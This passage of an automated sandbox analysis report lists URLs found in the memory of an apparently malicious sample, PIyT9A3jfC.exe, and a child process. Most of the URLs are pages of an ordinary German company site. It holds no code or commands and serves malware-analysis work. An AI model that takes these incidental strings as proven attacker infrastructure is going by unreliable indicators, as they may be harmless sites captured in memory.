PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.GPSENKE.com
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.591607281.0000000007B00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714841483.000000000138B000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.596668740.0000000004000000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.aevga.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.aiag.org/about
                  Source: PIyT9A3jfC.exe, 00000001.00000003.714841483.000000000138B000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000003.00000003.669232158.0000000004E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.c9dd.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.701151400.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.588156336.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.700295143.0000000007F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.586890411.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.586479452.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.587455999.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
                  Source: PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/administration/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/agb/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/asien/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/blog/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/branchen-know-how/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/central-warehouse-seite/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/central-warehouse/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/code-of-conducts/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/comments/feed/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/consigment-pakete/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/consignment/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/content-supply-management/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/datenschutz/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/decapsulating/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/direktvermarktung/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/diversity/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/en/start-english/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/europa/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/feed/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/hr/
